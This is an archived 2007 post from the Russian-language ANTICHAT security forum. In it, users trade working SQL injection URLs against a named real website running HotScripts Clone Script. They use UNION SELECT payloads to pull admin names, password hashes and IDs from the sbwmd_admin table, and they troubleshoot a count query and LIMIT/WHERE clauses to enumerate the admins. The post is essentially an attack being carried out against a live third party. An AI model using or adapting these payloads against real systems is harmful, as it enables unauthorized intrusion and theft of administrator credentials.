Форум АНТИЧАТ - SQL Инъекции

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.

Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.

⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

#11

20.11.2007, 18:34

big_BRAT

Познающий

Регистрация: 24.12.2006

Сообщений: 90

Провел на форуме:
1292655

Репутация: 168

Отправить сообщение для big_BRAT с помощью ICQ

Цитата:

Сообщение от -=lebed=-

SQL-инъекция в HotScripts Clone Script
Как посмотреть остальных админов?
Почему запросы с limit и where не прокатывают?

Код:

_http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char(58),id)+from+sbwmd_admin+limit+1,1/*
_http://www.filelook.com/software-description.php?id=-1+select+admin_name+from+sbwmd_admin+where+id=2/*

Дальше всё аналогично предыдущему примеру: к в админку не пускает, файлы читать,имхо, нет привилегий, limit,where не катят. В чём косяк?

я думаю нет там косяка, просто нету больше админов
1. _http://www.filelook.com/software-description.php?id=-1+union+select+count(admin_name)+from+sbwmd_admin/*
count возвращает кол 1

limit and order тоже работают
http://www.filelook.com/software-description.php?id=-1+union+select+concat(admin_name,char(58),pwd,char (58),id)+from+sbwmd_admin+limit+0,1/*
, такая же история и с "+where+id=1/*"